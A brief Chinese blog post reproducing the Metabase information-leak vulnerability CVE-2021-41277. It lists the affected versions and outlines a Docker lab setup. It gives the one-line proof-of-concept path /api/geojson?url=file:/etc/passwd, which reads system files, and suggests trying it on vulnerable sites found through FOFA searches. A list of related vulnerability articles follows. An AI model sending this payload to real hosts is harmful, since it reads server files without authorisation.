0x00 前置知识

1、metebase

metabase是一款开源的BI分析工具，开发语言clojure+React为主、也有高阶的收费版。官网：Metabase | Business Intelligence, Dashboards, and Data Visualization 可以利用Metabase进行数据分析，数据可视化，报表生成等。

Metabase介绍_Sshine___的博客-CSDN博客_metabase

2、影响版本：

metabase version < 0.40.5
metabase version >= 1.0.0, < 1.40.5

0x01 工具

1、docker

kali下对Docker的详细安装_涂寐的博客-CSDN博客_kali安装docker

2、kali

0x02 漏洞复现

1、fofa语法搜索

2、环境搭建

1）创建并运行容器

2）复现

（1）设置一下metebase

（2）随便在刚刚fofa找到的有metebase漏洞的网址，验证poc

/api/geojson?url=file:/etc/passwd

CVE-2021-41277(metebase信息泄漏漏洞复现)相关推荐

【漏洞通告】Windows 内核信息泄漏漏洞CVE-2021-31955
漏洞名称 : Windows 内核信息泄漏漏洞组件名称 : Windows 影响范围 : Windows 10 21h1/20h2/1809/1909/2004 Windows Server 201 ...
零视科技 H5S视频平台 GetUserInfo 信息泄漏漏洞 CNVD-2020-67113
零视科技 H5S视频平台 GetUserInfo 信息泄漏漏洞 CNVD-2020-67113 此文章仅供用于学习研究,严禁用于非法用途,否则后果自负. 漏洞简介零视技术(上海)有限公司是以领先的视 ...
PortSwigger Academy | Information disclosure vulnerabilities : 信息泄漏漏洞
文章目录什么是信息披漏? 信息公开的例子有哪些? 如何发现和利用信息披露漏洞 ↓ 信息泄露漏洞如何产生? 信息泄露漏洞的影响是什么? 如何评估信息泄露漏洞的严重性利用信息公开 ↓ 如何防止信息泄露 ...
linux心跳包检测代码_OpenSSL心跳包越界读敏感信息泄漏漏洞
发布日期:2014-04-10 CVE ID:CVE-2014-0160 受影响的软件及系统: ==================== OpenSSL 1.0.1-OpenSSL 1.0.1f Op ...
CISCO设备信息泄漏漏洞案例
前言在日常的渗透任务中,除了常见的集权设备,高危组件的漏洞挖掘,一些iot设备目标也是可以作为重点关注的存在.近期实战中遇到了几个cisco配置信息泄漏的案例,借此机会复习总结下cisco常见的漏洞 ...
CVE(2017-15715、2021-41773、2021-40438)漏洞复现
仅用于学习参考,不要贪玩哦(*^▽^*) 目录 CVE-2017-15715 漏洞介绍漏洞复现 CVE-2021-41773 漏洞介绍漏洞复现 CVE-2021-40438 漏洞介绍漏洞复现一 ...
PHPInfo()信息泄漏漏洞利用及提权
Simeon PHPInfo函数信息泄露漏洞常发生一些默认的安装包,比如phpstudy等,默认安装完成后,没有及时删除这些提供环境测试的文件,比较常见的为phpinfo.php.1.php和test ...
cisco设备信息泄漏漏洞案例【二】
前言上一篇文章介绍了cisco路由器设备的2个漏洞案例,这次补充cisco ip电话设备和安全设备的漏洞案例. CISCO-UCM ConfigFileCacheList.txt 泄漏 CISCO- ...
服务器信息泄漏漏洞,Windows2008 r2“Web服务器HTTP头信息泄露”漏洞修复(示例代码)...
一.漏洞名称漏洞名称漏洞摘要修复建议 Web服务器HTTP头信息泄露远程Web服务器通过HTTP头公开信息.修改Web服务器的HTTP头以不公开有关底层Web服务器的详细信息. 二.安装IIS 6 管 ...

CVE-2021-41277(metebase信息泄漏漏洞复现)